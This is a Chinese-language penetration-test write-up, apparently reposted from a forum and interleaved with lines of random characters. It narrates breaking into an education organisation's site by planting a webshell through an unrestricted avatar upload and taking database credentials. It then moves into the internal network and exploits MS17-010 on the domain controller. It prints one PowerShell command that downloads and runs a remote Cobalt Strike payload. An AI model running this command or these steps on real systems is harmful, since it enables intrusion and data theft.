|
+ X: V, `8 k3 ^! X 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路# b4 J! ?8 s, Q: D3 X
2 [; h0 o6 o5 B. O, `) l, L _
: V; Y ^7 R4 x+ C+ V2 G+ V9 O
4 z, M) L2 Z3 v) z8 L4 D" ]
' W6 l( g& @6 D& F0 Y$ G9 X) |" G- X& @5 g
正文
8 z9 V7 d' Y! j0 V7 J
3 N5 B) @+ s) N( B( p% f# k% o
, \- Q% c- c; w, y7 z0 O( |
. e, {9 j8 T, P+ z / @7 S0 G" t T/ ?9 y6 z
+ A: w2 U0 S. R" ^5 Q/ P 目标:www.xxxx.com(一家教育机构)
' }' M- o" u2 v打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
z8 [8 U; K1 A0 p# u% T
. k5 i6 Y5 h4 x4 p
+ B3 r: Q$ d" I3 X% Q9 |$ m . M1 m, p) k: z1 m* X8 d: f
0 R! }4 J5 D8 q$ P# {( ^4 i! c% T; T4 m0 b0 O8 x& @
进行了简单的信息搜集
$ i4 T# H/ m/ w8 C' ]
3 r+ S+ j. h `6 s5 S5 k9 m- y
3 W$ i+ w$ S% I% [, ]9 ^
, y! j9 k; Z, z$ [4 Y: U; [6 A/ N* Q* O1 Z+ T. L+ d
子域名搜集, A1 B# n" m$ f. D" P: j4 f
0 j' ~" o2 [4 ]* \) U/ u# P) Z
. M( e5 W9 [$ U: M$ m7 P4 V9 Y1 m
$ u3 N: G; G2 }: S1 ~
N+ Y9 G. f' }! Q& \3 S( Z! ~9 |1 d5 a( _, | \6 A
fofa找资产 5 E8 ^$ C& d% m( \
" P: ]. H) J0 r4 Z9 X. ?
2 A5 u c7 _$ G 5 x9 a# `8 @0 n( c: [$ [
. K2 @4 `1 b1 M- [, b- V5 [( y; g3 j. J
0 j8 u& Q. t+ r1 A1 H
6 U5 Z3 y3 \! @, z+ z$ P Q4 y$ x8 j
一共七个资产。去重之后只有两个。 : E; k. i% {, T* q* X& U
2 n- r/ E U) z" A( S8 |% U. ^9 f* _% ~4 l0 c+ r7 e/ K- x6 `
) X. S1 E q3 \4 c
% q9 W7 @7 A7 W' X' A5 j n7 j 目录探测
7 k9 M! d: L6 R9 d- H4 H
+ s2 \ e% d% g6 J+ g5 ~1 E; B
4 l/ l& n- h3 c7 s6 Y/ R6 | , z* F: d/ Z; F' S* _0 y+ F, c
9 U4 M0 G- m. b: t5 d
: j* L6 {0 ^) |4 w; [ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& i) }% H' U$ z8 h& i7 e- ~ 8 A5 S$ O" i. V$ ]
) y0 b, L- m: J# z" F
7 L, a! z7 k+ p. q, N: m: C9 w
我又尝试了通过修改返回包来绕过登录界面$ A4 g( @! l. E- R0 y5 ^+ \& {; B
9 T9 o. ~8 Y4 \( h: H
3 x3 [/ a$ f6 m6 \ d5 Y6 J
9 h) J2 P$ |: L% x# ]0 u
$ u6 O: g9 F- {7 d+ U7 y6 w
# S5 ~- F: g9 ]2 A+ A 还是不行,尝试注入无果3 M' P1 d3 A: A) F2 O; t
# c+ ?3 L% C0 P4 Y. {2 E6 i9 `6 I4 w+ B
2 P5 P' [; Y) l$ Y 4 Y/ u& L9 U6 K
! R, _8 h3 e% v6 Q% P" T4 w( u6 E4 v G3 R
不过我目录探测出了一处Spring信息泄露 9 h6 B# U* ?. B1 k K t
' M& F* D: B3 i3 F; o
3 V. z; Y: H$ ?2 i- }+ | 5 \3 D0 e8 r1 a4 H0 B6 j2 [
. h" @7 ]( i# s, [. b( e
7 X9 t) m9 m+ k+ F/ d4 Q : \" o( O" |4 g a& ~/ b
. h1 b" E$ h+ H, |& a; M! f! Z c/ r 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录4 j6 K Y6 B% U& [. @" @6 I
$ c5 q9 Q" T$ ] e s \# V
0 n R0 w: B c/ [% N. K6 K9 k( s. o
5 h. I0 C$ @$ M/ V. Y1 b1 r P
$ M) `; G; R! O+ q0 ~( ^( c( e( s& P' z% ^1 w
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, ?2 ^( L" R" G' E* h# o) T6 | % O- {: }8 ?* w7 j. f4 d
' N" `1 ?4 x) o$ \9 c- ^
+ @% [2 B: q6 O) R1 r
; J0 t* Q- a2 V, F1 B) Y
- B0 C, J2 _! H4 a, b" w/ R 获取有些师傅到这一步就手机抓包电脑测了。' `8 [8 `, |4 P* z) {, ~6 p
7 {( ?: M9 K% \& ^! q
! L. z4 u% r3 g( k Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。2 p: G: e+ A6 w/ O, v) v
) u2 _/ c& ]# d) d+ D
, I0 s) f. P: G4 V* B* ^) n2 E 其中在一个公众号发现了小程序,可以进行注册。
3 d8 x8 B4 p$ ?% ?7 a; t- w $ Q5 z5 F6 e6 O6 q
6 X ?# L. A) k" v/ R9 a/ r$ p 看到了头像上传,尝试上传获取WebShell; }8 P! H: h- S: ~0 `% D
( N( _4 O7 Q1 R8 X/ N5 ?, K1 X% D8 U1 j, J4 S2 \% K
( B. C! S4 h5 V h
8 ? [0 w+ A) z( Y4 ~, S" X2 [* o3 p+ |' B
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
& _' @- o$ U/ R: p7 _. f* n) j# S* i
/ |" L! F' G9 Y% w% }8 J
: s4 L5 ]5 _7 t0 k
& j. F- @' f/ q: j) B) }
0 z" s9 S6 L0 V2 |0 t% R
; E8 L- e. M) N$ D. o. l" i 然后上了大马
8 g w% @% b( F8 o1 }# E3 A 8 o0 G! g) r' ]# S$ `, t2 D! e
0 C% p% t. i5 j/ k8 K" }
. U# `2 H* E |; @. j
+ }( y, ?8 G& Z1 s0 j" l8 \ e2 D9 z
6 I( H4 r( i( K; f ) e' g8 t- \& E2 n" \+ e6 \$ ?
( l- x7 \" U$ {. q2 F. f4 i: n! J
; f8 a" J, L, [$ @ 通过翻找文件发现数据库账号密码" r% T+ c2 B, ~, Q. E
; X& L. F2 p0 M. l2 d
. P7 [$ ]4 {3 Z( i& A: b7 G; P0 e i1 [/ e3 K" @3 n; \5 G
1 E3 r2 s- r) v# E! x& q
! w+ e5 t+ l1 V
--内网渗透
2 U$ G. [5 \% r" |9 S, Q5 g1 v
# l% C/ ?- N0 Q# X+ t. w/ j$ Y4 Z# e# t/ T' @1 F; m# d/ {
直接通过powershell执行 cs上线0 Z7 L w3 C) O* P @8 E
" `3 T0 h" C9 \) n
% J1 u6 G* @, F9 M [% [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"3 H& ]5 \6 m& c
, c' P6 Q9 j' i5 x5 P! ]; X+ q
% H0 G& W6 N* a5 }, w* X3 t, c ) l; R* u& X2 K/ _5 C
5 B" b# n. h" M k
: V$ j2 J H2 u$ b9 m 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破& u, V9 ^+ H! X% n
; C* V: L# K* F
8 e4 w* u [: ^) \ : S+ d& l( x* p0 C1 T+ P
/ Y0 V/ Z# T4 G- B3 a5 G
1 C( s' S- q+ d( ]/ X$ d/ d 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& e6 S" C' v1 {% x7 ~
' D) x: ~' d+ Q. l& t0 t% C . _9 c) M) t# a# h3 S8 U/ c4 y& o
2 _4 I7 M. v" i& ]$ X# i
& `% ]# @7 x V0 e
; \# v! x" g* I7 f4 c) O$ m4 ^2 v ! v7 R, T: T w9 L4 l
- e; e/ M5 p. q3 u. }9 l
/ j3 z% F) y" N: ?' z. x- _7 F 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 - \. P+ k5 Z! Z0 i) I
1 n* J7 g3 _6 p k+ v) I. F# `* N3 j8 Y i5 W1 y: q$ b h
* L K1 q: Z/ }+ a0 z- b
) n3 n5 a& q3 ^; U* D) [- S 7 Z; Q. s% j2 j* @
+ M$ a& ?; y' u) p+ E
& x% z% E* y7 ^6 w
/ K) `1 t4 B& }$ |1 t) O& @8 X
$ A5 Q- T9 d0 N8 `; q4 b6 w! U3 z& V5 x. s
2 ~* p$ Y+ R5 n" Q4 G2 C
q9 I5 x1 v* _
' y- s& e# V b! v. g / ?/ M: x4 J1 G9 c: m$ a
# C. A# w9 p1 {( `$ H; N$ C
$ n" w1 r1 V' M8 U7 a, g 小结
+ q2 N3 G0 @3 X9 J5 ]6 W
! ~ {6 U& j# t- B, j* Z1 ~' W2 Y' l# w3 O% E
& v7 P1 c$ ~ H5 H3 z e4 V
% {: ~$ G6 q8 k" D) ? O: v& w1 ^& g
6 I0 ]! \' H3 `) ~9 V" p 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
3 z) p. V M0 _& ^7 [+ E* t' m
: G' x! H7 s8 [3 R$ b6 y/ X* X
- I5 q/ A! ?# u: v$ D- b
* }$ E b3 Q% P. f) P# Y+ @ s$ o% M 5 Z; t" y4 v7 ?+ y4 P6 `% ]0 E
m% W& a# X9 U% }
-
' Q( ?! X5 X; f( v4 M6 @( _, i % C; O' ?0 F" R4 Q$ x- H
+ _6 E% a$ H1 z, |1 F% D3 \ - 7 P, h: X w) I
4 J1 e4 h. S* H- t/ M
- M- l N5 H6 b4 \' y
9 F# V0 {& W3 R. n, d- y" D/ d
: Q. j0 ^* k' R7 w7 c 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
/ k! o. W k+ h9 ~0 ? " X, H" ]3 E- v1 n# ^! |' N5 L% R) A3 Y
4 c0 q0 x/ g ~. T" x0 V % |9 T8 F% X/ H1 s; i& u% y+ o
|